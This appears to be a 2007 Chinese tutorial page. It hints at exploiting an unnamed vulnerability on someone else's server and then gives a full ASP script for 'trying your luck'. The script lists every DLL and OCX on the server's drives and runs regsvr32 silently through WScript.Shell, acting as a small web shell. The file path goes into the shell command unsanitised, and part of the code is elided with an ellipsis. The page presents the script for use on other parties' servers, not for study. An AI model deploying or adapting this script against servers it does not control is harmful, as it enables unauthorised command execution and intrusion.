远程连接服务器,利用对方服务器漏洞远程注册DLL

利用对方服务器漏洞远程注册DLL - 网络安全 - 电脑教程网

利用对方服务器漏洞远程注册DLL

日期:2007-01-05   荐:
利用对方服务器漏洞远程注册DLL 我和朋友一起下载了一个相同的组件,苦于无法注册而没用,但最近我发现他在使用这个组件,显然是已经注册了,好奇怪,他是怎么注册的呢?我问他他不说。

其实,我们在ASP中,是有捷径远程注册DLL的,但需要对方服务器漏洞的“配合”(什么漏洞?我可什么都没说啊,自己看)。试试下面的代码,或许侥幸成功呢:
<% Response.Buffer = True %>
<% Server.ScriptTimeout = 500
Dim frmFolderPath, frmFilePath

frmFolderPath = Request.Form("frmFolderPath")
frmFilePath = Request.Form("frmDllPath")
frmMethod = Request.Form("frmMethod")
BTnREG = Request.Form("btnREG")
%>

<Html>
<HEAD>
  <TITLE>精彩春风之远程注册DLL</TITLE>
  <STYLE TYPE="TEXT/Css">
  .Legend {FONT-FAMILY: veranda; FONT-SIZE: 14px; FONT-WEIGHT: bold; COLOR: blue}
  .FS {FONT-FAMILY: veranda; FONT-SIZE: 12px; BORDER-WIDTH: 4px; BORDER-COLOR: green;
    MARGIN-LEFT:2px; MARGIN-RIGHT:2px}
  TD {MARGIN-LEFT:6px; MARGIN-RIGHT:6px; PADDING-LEFT:12px; PADDING-RIGHT:12px}
  </STYLE>
</HEAD>

<BODY>
<FORM NAME="regForm" METHOD="POST">
<TABLE BORDER=0 CELLSPACING=6 CELLPADDING=6 MARGINWIDTH=6>
<TR>
  <TD VALIGN=TOP>
  <FIELDSET ID=FS1 NAME=FS1 CLASS=FS>
  <LEGEND CLASS=Legend>注册DLL</LEGEND>
  敲入到DLL目录的路径

  <INPUT TYPE=TEXT NAME="frmFolderPath" VALUE="<%=frmFolderPath%>">

  <INPUT TYPE=SUBMIT NAME=btnFileList VALUE="创建文件列表">

<%
IF Request.Form("btnFileList") <> "" OR btnREG <> "" Then
    Set RegisterFiles = New clsRegister
      RegisterFiles.EchoB("Select File")
      Call RegisterFiles.init(frmFolderPath)
      RegisterFiles.EchoB("
<INPUT TYPE=SUBMIT NAME=btnREG VALUE=" & Chr(34) _
& "REG/UNREG" & Chr(34) & ">")
    IF Request.Form("btnREG") <> "" Then
      Call RegisterFiles.Register(frmFilePath, frmMethod)
    End IF
    Set RegisterFiles = Nothing
  End IF
%>
  </FIELDSET>
  </TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>
<%
Class clsRegister

Private m_oFS

Public Property Let oFS(objOFS)
m_oFS = objOFS
End Property
……
Sub init(strRoot) 'Root to Search (c:, d:, e:)
Dim oDrive, oRootDir
IF oFS.FolderExists(strRoot) Then
IF Len(strRoot) < 3 Then 'Must Be a Drive
Set oDrive = oFS.GetDrive(strRoot)
Set oRootDir = oDrive.RootFolder
Else
Set oRootDir = oFS.GetFolder(strRoot)
End IF
Else
EchoB("噢,文件夹( " & strRoot & " )没找到!")
      Exit Sub
    End IF
    setRoot = oRootDir
    
    Echo("<SELECT NAME=" & Chr(34) & "frmDllPath" & Chr(34) & ">")
      Call getAllDlls(oRootDir)
    EchoB("</SELECT>")
    BuildOptions
  End Sub
  
  Sub getAllDlls(oParentFolder)
  Dim oSubFolders, oFile, oFiles
    Set oSubFolders = oParentFolder.SubFolders
    Set opFiles = oParentFolder.Files
    
    For Each oFile in opFiles
      IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
        Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
        & oFile.Name & "</Option>")
      End IF
    Next
    
    On Error Resume Next
    For Each oFolder In oSubFolders 'Iterate All Folders in Drive
      Set oFiles = oFolder.Files
      For Each oFile in oFiles
        IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
          Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
          & oFile.Name & "</Option>")
        End IF
      Next
      Call getAllDlls(oFolder)
    Next
    On Error GoTo 0
  End Sub

  Sub Register(strFilePath, regMethod)
  Dim theFile, strFile, oShell, exitcode
    Set theFile = oFS.GetFile(strFilePath)
    strFile = theFile.Path

    Set oShell = CreateObject ("WScript.Shell")

    IF regMethod = "REG" Then 'Register
      oShell.Run "c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False
      exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False)
       EchoB("regsvr32.exe exitcode = " & exitcode)
    Else 'unRegister
      oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False
      exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False)
       EchoB("regsvr32.exe exitcode = " & exitcode)
    End IF
    
    Cleanup oShell
  End Sub
  
  Sub BuildOptions
    EchoB("Register: <INPUT TYPE=RADIO NAME=frmMethod VALUE=REG CHECKED>")
    EchoB("unRegister: <INPUT TYPE=RADIO NAME=frmMethod VALUE=UNREG>")
  End Sub
  
  Function Echo(str)
    Echo = Response.Write(str & vbCrLf)
  End Function
  
  Function EchoB(str)
    EchoB = Response.Write(str & "
" & vbCrLf)
  End Function
  
  Sub Cleanup(obj)
    If isObject(obj) Then
      Set obj = Nothing
    End IF
  End Sub
  
  Sub Class_Terminate()
    Cleanup oFS
  End Sub
End Class
%>



----
最好的答案:  
http://www.huachu.com.cn/itbook/itbookinfo.asp?lbbh=BD04605180
http://www.waterpub.com.cn/sale/result.asp?id=5301  
最好的介绍:  
http://www.intels.net/
----
Internet是第一生产力; 
网站建设是它的核心; 
ASP 
就是网站的灵魂。
----
《ASP与相关数据库技术高级指南》[ASP的专家]

(出处:http://www.sheup.com)




标签: